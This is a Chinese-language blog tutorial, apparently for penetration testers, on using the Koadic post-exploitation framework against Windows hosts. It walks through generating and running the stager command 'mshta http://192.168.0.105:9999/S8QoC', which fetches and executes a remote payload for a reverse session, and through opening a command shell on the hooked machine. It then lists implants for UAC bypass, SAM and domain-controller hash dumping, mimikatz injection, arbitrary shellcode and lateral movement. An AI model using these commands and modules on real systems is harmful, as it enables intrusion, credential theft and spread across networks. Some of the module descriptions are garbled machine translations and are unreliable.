后渗透工具Koadic:你真的了解我吗?
前言:
在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧。
首先把项目克隆到本地:
项目地址
https://github.com/zerosum0x0/koadic.git
然后解压,如果你要安装到你指定的目录就先cd到那个目录在下载,我是复制到那了,所以我解压。如下图
运行koadic
cd koadic-master/ //cd到软件目录 sudo ./koadic //用最高权限运行koadic
打开Koadic,显示需要设置的内容
下图命令如下
(koadic: sta/js/mshta)# info //
查看需要设置的内容
查看工具使用帮助
(koadic: sta/js/mshta)# help
大佬跳过我的翻译,英语很渣而且是全靠感觉翻译的(很辛苦,靠经验和百度翻译蒙)
(koadic: sta/js/mshta)# help //帮助的意思 COMMAND DESCRIPTION 命令 描述 ——— ————- load reloads all modules //显示 info shows the current module options//显示当前模块选项。 use switch to a different module//切换到不同的模块 set sets a variable for the current module//为当前模块设置一个变量 jobs shows info about jobs//显示有关工作的信息 help displays help info for a command//获取一个cmdshell cmdshell command shell to interact with a zombie// 命令 shell 与僵尸交互 kill shows info about jobs//显示有关工作的信息 listeners shows info about stagers//显示信息的传输器载荷 exit exits the program//退出 zombies lists hooked targets//显示所有僵尸会话 run runs the current module//运行,和exploit一个样 verbose exits the program//退出程序
进入主题 ,开始设置。听着是不是热血沸腾要往下看了,哈哈。其实没啥要讲的,你只需要set lhost
这个命令大家应该都懂得,就是设置本地ip。
如下图
注意看,他生成了一个网址,
其实这是一个恶意网址,里面装载了exploit
最后生成的利用命令如下
mshta http://192.168.0.105:9999/S8QoC
利用方法是放到cmd里面执行
如下图
其实你可以看到他弹出了事件查看器我也不知道为什么,不是我点开的啊,
也可能会好奇mshta是什么意思,正解如下
mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件
我想就是这样利用的吧
那么当目标主机运行这个命令的时候,我们这边就反弹回来了会话 会话ID为0
如下图
如果是用其他复制批量执行了这个命令,会话比较多的话可以执行zombies来查看左右会话,并选择id进行控制
然后如果我这里想获取一个cmdshell的话,方法如下
cmdshell ID 我这里应该是 cmdshell 0
如下图
当然这怎么能算得上好用的后渗透呢,这怎么能满足大家呢
当然了,上面只是普通操作,普通操作,所谓后渗透,在下面,
慢慢看嘛,这个后渗透工具值得上榜的原因我认为有几条
1.环境要求不高 2.操作很简单 3.提供的后渗透模块很实用丰富
后渗透模块我就不一个一个讲了,设置都很简单
我主要给你们说一下名字
- Hooks a zombie
- Elevates integrity (UAC Bypass)
- Dumps SAM/SECURITY hive for passwords
- Scans local network for open SMB
- Pivots to another machine
Stagers(传输器载荷)
Stagers hook target zombies and allow you to use implants.
传输器载荷可以 hook 目标僵尸,进而方便使用植入。
Module |
Description |
---|---|
stager/js/mshta |
可以使用HTML的应用程序在内存中的有效载荷mshta.exe |
stager/js/regsvr |
可以使用regsvr32.exe COM+脚本内存负载 |
stager/js/rundll32_js |
serves payloads in memory using rundll32.exe 可以使用rundll32.exe内存负载 |
stager/js/disk |
serves payloads using files on disk 使用磁盘上的文件提供有效载荷 |
Implants(
Implants start jobs on zombies.
Implants 在僵尸上运行。
Module |
Description |
---|---|
implant/elevate/bypassuac_eventvwr |
Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.使用enigma0x3的eventvwr.exe漏洞绕过UAC的Windows 7, 8,和10。 |
implant/elevate/bypassuac_sdclt |
Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.使用enigma0x3的sdclt.exe漏洞绕过UAC的Windows 10。 |
implant/fun/zombie |
Maxes volume and opens The Cranberries YouTube in a hidden window.长量和隐藏的窗口打开小红莓YouTube。 |
implant/fun/voice |
Plays a message over text-to-speech.在文本到语音之间传递信息。 |
implant/gather/clipboard |
Retrieves the current content of the user clipboard.检索用户剪贴板的当前内容。 |
implant/gather/hashdump_sam |
Retrieves hashed passwords from the SAM hive.从SAM hive检索密码。 |
implant/gather/hashdump_dc |
Domain controller hashes from the NTDS.dit file.域控制器hashes从NTDS。说文件。 |
implant/inject/mimikatz_dynwrapx |
Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).注入一个反射加载的DLL来运行powerkatz。dll(使用动态包装器X)。 |
implant/inject/mimikatz_dotnet2js |
Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).注入一个反射加载的DLL来运行powerkatz。dll(@tirannido DotNetToJS)。 |
implant/inject/shellcode_excel |
Runs arbitrary shellcode payload (if Excel is installed).运行任意的shell代码有效负载(如果已经安装了Excel)。 |
implant/manage/enable_rdesktop |
Enables remote desktop on the target.在目标上启用远程桌面。 |
implant/manage/exec_cmd |
Run an arbitrary command on the target, and optionally receive the output.在目标上运行任意命令,并可选地接收输出。 |
implant/pivot/stage_wmi |
Hook a zombie on another machine using WMI.用WMI把僵尸挂在另一台机器上。 |
implant/pivot/exec_psexec |
Run a command on another machine using psexec from sysinternals.使用sysinternals中的psexec在另一台机器上运行一个命令。 |
implant/scan/tcp |
Uses HTTP to scan open TCP ports on the target zombie LAN.使用HTTP扫描目标僵尸网络上的TCP端口。 |
implant/utils/download_file |
Downloads a file from the target zombie.从目标僵尸下载一个文件 |
implant/utils/upload_file |
Uploads a file from the listening server to the target zombies.上传一个从监听服务器到目标僵尸的文件 |
Disclaimer 声明
代码示例仅供教育参考,因为只有研究攻击者使用的攻击手段,才能建立足够强大的防御体系。 在未经事先许可的情况下使用此代码对目标系统进行操作是非法的,作者对此不负任何责任。
有不好的地方请指出
- Injectify:一款执行MiTM攻击的工具
- 看我如何发现Google云平台漏洞并获得$7500赏金
- Go语言写Web 应用程序
- 小萝莉说Crash(一):Unrecognized selector sent to instance xxxx
- 游戏服务器之多线程发送(上)
- 游戏服务器之多线程发送(中)
- 游戏服务器之多线程发送(下)
- 【团队分享】手机QQ:升级iOS8.3后,发图就崩,为哪般?
- golang 字符串操作实例
- 【团队分享】刀锋铁骑:常见Android Native崩溃及错误原因
- OpenShift企业版安装:单Master集群
- http线程池的设计与实现(c++)
- iOS崩溃堆栈符号化,定位问题分分钟搞定!
- Duang~ Android堆栈慘遭毁容?精神哥揭露毁容真相!
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- SQL 语句单引号、双引号的用法
- 浙大版《C语言程序设计(第3版)》题目集 练习3-5 输出闰年
- 浙大版《C语言程序设计(第3版)》题目集 练习3-7 成绩转换
- 浙大版《C语言程序设计(第3版)》题目集 练习3-8 查询水果价格
- 浙大版《C语言程序设计(第3版)》题目集 习题3-1 比较大小
- 浙大版《C语言程序设计(第3版)》题目集 习题3-3 出租车计价
- 浙大版《C语言程序设计(第3版)》题目集 习题3-4 统计学生成绩
- 浙大版《C语言程序设计(第3版)》题目集 习题3-5 三角形判断
- 浙大版《C语言程序设计(第3版)》题目集 练习4-3 求给定精度的简单交错序列部分和
- Linux 如何手动释放Swap、Buffer和Cache
- 浙大版《C语言程序设计(第3版)》题目集 练习4-6 猜数字游戏
- 浙大版《C语言程序设计(第3版)》题目集 练习4-7 求e的近似值
- TypeScript高级类型备忘录(附示例)
- 浙大版《C语言程序设计(第3版)》题目集 练习4-10 找出最小值
- 牛逼!力挺一款实用的 Linux 资源监视工具